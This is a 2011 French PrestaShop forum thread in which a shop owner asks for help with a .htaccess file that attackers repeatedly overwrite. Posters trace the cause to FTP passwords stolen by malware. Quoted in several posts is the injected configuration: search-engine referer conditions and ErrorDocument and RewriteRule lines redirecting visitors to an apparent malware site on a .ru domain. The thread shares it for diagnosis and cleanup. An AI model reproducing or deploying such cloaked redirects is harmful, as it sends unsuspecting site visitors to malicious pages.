leking94 Posted January 28, 2011 Share Posted January 28, 2011 BonjourJ attends toujours une solution pour le piratage de mon .htaccess recurent depuis 6 mois sur mon site www.odyssee-groupe.com.Merci de m aider.Aucune trace sur les logs.---------------------------------------------------SetEnv REGISTER_GLOBALS 0SetEnv PHP_VER 5RewriteEngine OnRewriteCond %{HTTP_REFERER} .*google.* [OR]RewriteCond %{HTTP_REFERER} .*ask.* [OR]RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]RewriteCond %{HTTP_REFERER} .*baidu.* [OR]RewriteCond %{HTTP_REFERER} .*youtube.* [OR]RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]RewriteCond %{HTTP_REFERER} .*qq.* [OR]RewriteCond %{HTTP_REFERER} .*excite.* [OR]RewriteCond %{HTTP_REFERER} .*altavista.* [OR]RewriteCond %{HTTP_REFERER} .*msn.* [OR]RewriteCond %{HTTP_REFERER} .*netscape.* [OR]RewriteCond %{HTTP_REFERER} .*aol.* [OR]RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]RewriteCond %{HTTP_REFERER} .*goto.* [OR]RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]RewriteCond %{HTTP_REFERER} .*mamma.* [OR]RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]RewriteCond %{HTTP_REFERER} .*lycos.* [OR]RewriteCond %{HTTP_REFERER} .*search.* [OR]RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]RewriteCond %{HTTP_REFERER} .*bing.* [OR]RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]RewriteCond %{HTTP_REFERER} .*facebook.* [OR]RewriteCond %{HTTP_REFERER} .*twitter.* [OR]RewriteCond %{HTTP_REFERER} .*blog.* [OR]RewriteCond %{HTTP_REFERER} .*live.* [OR]RewriteCond %{HTTP_REFERER} .*myspace.* [OR]RewriteCond %{HTTP_REFERER} .*mail.* [OR]RewriteCond %{HTTP_REFERER} .*yandex.* [OR]RewriteCond %{HTTP_REFERER} .*rambler.* [OR]RewriteCond %{HTTP_REFERER} .*ya.* [OR]RewriteCond %{HTTP_REFERER} .*aport.* [OR]RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]RewriteCond %{HTTP_REFERER} .*flickr.*# .htaccess automaticaly generated by PrestaShop e-commerce open-source solution# http://www.prestashop.com - http://www.prestashop.com/forums# URL rewriting module activationRewriteEngine on# URL rewriting rules# Catch 404 errorsErrorDocument 404 404.php----------------------------------------------------------Cdltleking9406.13.95.45.01 Link to comment Share on other sites More sharing options...
jeckyl Posted January 28, 2011 Share Posted January 28, 2011 et vous avez changé tous vos mot de passe FTP, administration hébergement, mise à jour dernière version Prestashop, mot de passe compte mail ... Link to comment Share on other sites More sharing options...
leking94 Posted January 28, 2011 Author Share Posted January 28, 2011 non pas fait de mise a jour, car je n arrive pas a re-installe mon panier en ht avec tva meme en copie.j ai changé plusieurs fois les codes ftp et admin hébergementmdp compte mailje ne sais pas comment ils font.c est que le haccess : peut on empecher la ré écriture de ce fichierj ai l impression qu il est généré en interne automatiquement.j ai installé un pack de langue russe - est ce la dedans ? je l ai supprimé et ca continue. Link to comment Share on other sites More sharing options...
jeckyl Posted January 28, 2011 Share Posted January 28, 2011 Pas la mojndre idée, c'est assez complexe de trouver la cause, mais bien entendu vous pouvez bloquer le htaccess en lui mettant des droit très limités.Attention à ne pas retirer tous les droits dessus sinon plus possible de le modifier. Link to comment Share on other sites More sharing options...
leking94 Posted January 28, 2011 Author Share Posted January 28, 2011 bjrj ai bloquer les droits mais il arrive a re-ecrire dessus Link to comment Share on other sites More sharing options...
jeckyl Posted January 28, 2011 Share Posted January 28, 2011 Donc tu dois surement avoir un script qui écrit dessus, il faut donc regarder l'heure de modification du fichier et aussi regarder dans les log d'accès et autre si tu trouve quelque chose. Link to comment Share on other sites More sharing options...
leking94 Posted January 28, 2011 Author Share Posted January 28, 2011 merciau prochain piratage je diffuse ici les logs et le fichier htaccess piraté. Link to comment Share on other sites More sharing options...
leking94 Posted January 28, 2011 Author Share Posted January 28, 2011 est ce qu il est possible qu on est piraté l'adresse ipc est a dire que mon adresse www.odyssee-groupe.comsoit identique a celle de quelqu un d autre.?merci Link to comment Share on other sites More sharing options...
jeckyl Posted January 28, 2011 Share Posted January 28, 2011 éditez votre message précédent car on apprend l'adresse de votre backoffice. Link to comment Share on other sites More sharing options...
coeos.pro Posted January 28, 2011 Share Posted January 28, 2011 Bonjour, il y aurait pas un cron sur le htaccess ? en fait un cron sur un fichier qui réecrit le htaccess ou alors qui l'efface et en crée un nouveau... ou alors qui copie un htaccess qui serait caché dans un coin sur la racine... et rien de rien sur les logs ? vous êtes chez ovh? Link to comment Share on other sites More sharing options...
leking94 Posted January 29, 2011 Author Share Posted January 29, 2011 BONJOUR> > > > VIENS D ETRE PIRATE PAR CHANGEMENT DE MON HTACCESS> > ACTUELLEMENT EN LIGNE SOUS http://www.odyssee-groupe.com/mon site est bloqué> > rien sur les LOGS OVH - C EST ARRIVE IL Y A 1 HEURE A PEUT PRES> > > PIRATAGE AUJOURDHUI A 14H45 D APRES LE FICHIER HTACCESS REMPLACé. Link to comment Share on other sites More sharing options...
leking94 Posted January 29, 2011 Author Share Posted January 29, 2011 VOILA LE FICHIER PIRATE htaccess.txt Link to comment Share on other sites More sharing options...
leking94 Posted January 29, 2011 Author Share Posted January 29, 2011 il fait 5 kb mais quand je l ouvre rien n apparait Link to comment Share on other sites More sharing options...
jeckyl Posted January 29, 2011 Share Posted January 29, 2011 il fait 5 kb mais quand je l ouvre rien n apparait c'est que tout est mis en plein milieu du fichier. Link to comment Share on other sites More sharing options...
jeckyl Posted January 29, 2011 Share Posted January 29, 2011 BONJOUR> > > > VIENS D ETRE PIRATE PAR CHANGEMENT DE MON HTACCESS> > ACTUELLEMENT EN LIGNE SOUS http://www.odyssee-groupe.com/mon site est bloqué> > rien sur les LOGS OVH - C EST ARRIVE IL Y A 1 HEURE A PEUT PRES> > > PIRATAGE AUJOURDHUI A 14H45 D APRES LE FICHIER HTACCESS REMPLACé. maintenant il faut regarder ce qui s'est passé dan les log en comparant l'heure du fichier htaccess sur votre serveur. Link to comment Share on other sites More sharing options...
coeos.pro Posted January 29, 2011 Share Posted January 29, 2011 il faut regarder au milieu du fichier, on y retrouve grosso modo ce qu'il y a dans le premier post avec à la fin : RewriteRule ^(.*)$ http://meeshondacars.ru/pingvi/index.php [R=301,L] Link to comment Share on other sites More sharing options...
leking94 Posted January 29, 2011 Author Share Posted January 29, 2011 voila j ai trouvealors quelle solution ca fait 6 mois que ca dure RewriteEngine On ErrorDocument 400 http://meeshondacars.ru/pingvi/index.php ErrorDocument 401 http://meeshondacars.ru/pingvi/index.php ErrorDocument 403 http://meeshondacars.ru/pingvi/index.php ErrorDocument 404 http://meeshondacars.ru/pingvi/index.php ErrorDocument 500 http://meeshondacars.ru/pingvi/index.php RewriteCond %{HTTP_REFERER} .*google.* [OR] RewriteCond %{HTTP_REFERER} .*ask.* [OR] RewriteCond %{HTTP_REFERER} .*yahoo.* [OR] RewriteCond %{HTTP_REFERER} .*baidu.* [OR] RewriteCond %{HTTP_REFERER} .*youtube.* [OR] RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR] RewriteCond %{HTTP_REFERER} .*qq.* [OR] RewriteCond %{HTTP_REFERER} .*excite.* [OR] RewriteCond %{HTTP_REFERER} .*altavista.* [OR] RewriteCond %{HTTP_REFERER} .*msn.* [OR] RewriteCond %{HTTP_REFERER} .*netscape.* [OR] RewriteCond %{HTTP_REFERER} .*aol.* [OR] RewriteCond %{HTTP_REFERER} .*hotbot.* [OR] RewriteCond %{HTTP_REFERER} .*goto.* [OR] RewriteCond %{HTTP_REFERER} .*infoseek.* Link to comment Share on other sites More sharing options...
jeckyl Posted January 29, 2011 Share Posted January 29, 2011 il faut trouver dans les log ce qui se passe et qui modifie le fichier si c'est externe ou interne à votre serveur. Link to comment Share on other sites More sharing options...
leking94 Posted January 30, 2011 Author Share Posted January 30, 2011 PIRATAGE A 14H45 - VOICI LES LOGS Link to comment Share on other sites More sharing options...
leking94 Posted January 30, 2011 Author Share Posted January 30, 2011 - [29/Jan/2011:14:37:28 +0100] "/img/favicon.ico HTTP/1.1" 200 - [29/Jan/2011:14:51:26 +/lan Link to comment Share on other sites More sharing options...
www.urtica.fr Posted March 10, 2011 Share Posted March 10, 2011 Bonjour,Avez vous trouvé une solution ?Le menu d'administration de presta permet de générer le .htaccess, il y a donc un script php qui permet de le modifier installé sur ton serveur.Il y a peut être une faille sur ce script ?As tu installé la dernière version de PrestaShop ?A ta place, je tenterai de supprimer ou renommer le script générant le .htaccess, c'est peut être un robot qui utilise une faille... Link to comment Share on other sites More sharing options...
AV_Jumper Posted March 17, 2011 Share Posted March 17, 2011 Bonjour, je reviens sur le sujet car il m'est arrivé la meme chose, un htacces a été ajouté à la racine de mon serveur, je le surveille tous les jours mais ça revient de façon récurente, j'ai remplacé les mots de passe d'acces ftp etc et forcé chmod pour protéger les fichiers en écriture mais rien n'y fait!! Le problème c'est que google avait détecté certains liens de nos sites comme abritant des malware .... une fois désinfecté, j'ai refait une demande à google qui a enlevé ses avertissements mais je suis obligé de surveiller de tres pres pour effacer ce fameux htacces qui me pourrit la vie.J'ai pourtant cherché mais pas trouvé de solution. Link to comment Share on other sites More sharing options...
coeos.pro Posted March 17, 2011 Share Posted March 17, 2011 Bonjour, vous pourriez nous montrer tous les modules que vous avez installés (qui ne sont pas d'origine) Link to comment Share on other sites More sharing options...
Captain FLAM Posted March 17, 2011 Share Posted March 17, 2011 Pour ceux que ça intéresse :* Je suis en train de monter un serveur sécurisé contre ce genre de choses ...Certains de mes clients se sont fait vérolé leur site, et ensuite le schéma classique : le temps de s'en apercevoir, black-listé par Google, et le temps qu'il revienne scanner le site : perte de chiffre d'affaire, de la confiance des nouveaux clients, etc ...Aussi afin de réagir, ai-je cherché une solution d'une société existante et spécialisée ... que nenni trouvais-je ...Aucune ne proposait de solution efficace, si ce n'est pour des "grands comptes" (EDF, Vivendi, laposte, etc ...)Donc, il m'est apparu clairement que la seule façon de se protéger était de maîtriser les choses, à commencer par le serveur et les applications qui tournent dessus.Ensuite, de développer des interfaces d'utilisation pour les propriétaires de sites ...Si vous êtes intéressé pour prendre une place sur ce serveur (elles sont forcément limitées), faites-moi signe :Sur Skype : captain_flam_88ou par Message Privé.:-) Link to comment Share on other sites More sharing options...
coeos.pro Posted March 17, 2011 Share Posted March 17, 2011 Ca m'interresse, enfin surtout de savoir comment tu fais pour détecter un module qui contient un "virus" Link to comment Share on other sites More sharing options...
Captain FLAM Posted March 17, 2011 Share Posted March 17, 2011 Il faut agir en amont, étant donné que si tu colmate une faille aujourd'hui, un p'tit jeune en aura trouvé une nouvelle demain ...Seule solution : La signature de fichiers, et le scan temps réel !! Link to comment Share on other sites More sharing options...
www.urtica.fr Posted March 18, 2011 Share Posted March 18, 2011 Bonjour,Tu pourrais essayer de renommer ce script, c'est lui qui génére le fichier .htaccess :/admin/tabs/AdminGenerator.php Link to comment Share on other sites More sharing options...
AV_Jumper Posted March 22, 2011 Share Posted March 22, 2011 Bonjour à tousSuite à tous ces désagrément, nous avons découvert d'ou venait le problème de piratage. En fait l'acces vers le serveur se fait via le ftp. En effet, un malware à été detecté sur la machine dont on se sert pour l'acces ftp (acces avec FTP Expert).Le malware en question récupère les mots de passe ftp de la machine. On devine la suite !!La solution: Télécharger dans un premier temps le logiciel Adaware (gratuit) et apres les mise à jour, lancer un scan complet (c'est long mais vous serez surpris du nombre de vilaines bébètes présentes sur votre machine).Faites la meme chose sur toutes les machines susceptibles d'avoir un acces ftp. Ensuite, changez tous vos mots de passe ftp et préférez le webtransfert proposé par votre fournisseur.Surtout n'utilisez plus (du moins pour quelques temps) votre client ftp. Le cas échéant, changez aussi le mot de passe de votre acces privé sur le site du serveur.L'deal pour vérifier votre fichier htaccess est d'avoir un acces ftp via votre téméphone portable.Apres vérification des logs pendant quelques jours vous verrez que l'acces pirate à été stoppé faute de pouvoir récupérer le mot de passe ftp.J'espère que celà vous aidera Link to comment Share on other sites More sharing options...
Captain FLAM Posted March 22, 2011 Share Posted March 22, 2011 Bonne info ... Le lien pour télécharger Ad-aware :http://www.01net.com/telecharger/windows/Securite/anti-spyware/fiches/11643.html+ 1 Antivirus+ 1 FirewallEt si vous êtes parano (comme moi ) :WinPooch Link to comment Share on other sites More sharing options...
AV_Jumper Posted April 1, 2011 Share Posted April 1, 2011 Bonjour, autre petite astuce si vos sites sont dans des répertoires et non pas à la racine du serveur dans laquelle le fichier .htacces piraté revenait régulièrement.Insérez ce bout de code php dans la page index.php de votre prestashop ainsi que dans l'index.php de l'admin.Ainsi le fameux .htacces indésirable sera systématiquement effacé à chaque fois que quelqu'un se connectera à votre site.(Je le répète à n'utiliser que si votre (vos) site(s) est (sont) dans des répertoires et non pas à la racine du serveur.) $fichier = '../.htaccess'; if( file_exists ( $fichier)) unlink( $fichier ) ; A utiliser à vos risques et périls ;) Link to comment Share on other sites More sharing options...
AV_Jumper Posted August 26, 2011 Share Posted August 26, 2011 Retour sur le sujet avec un petit plus pour la securité des mots de passe avec windows 7, refusez la mise en cache de vos identifiants et mots de passe depuis votre navigateur , et pour entrer vos identifiants, utilisez le clavier virtuel de windows voilà , bonne journée Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now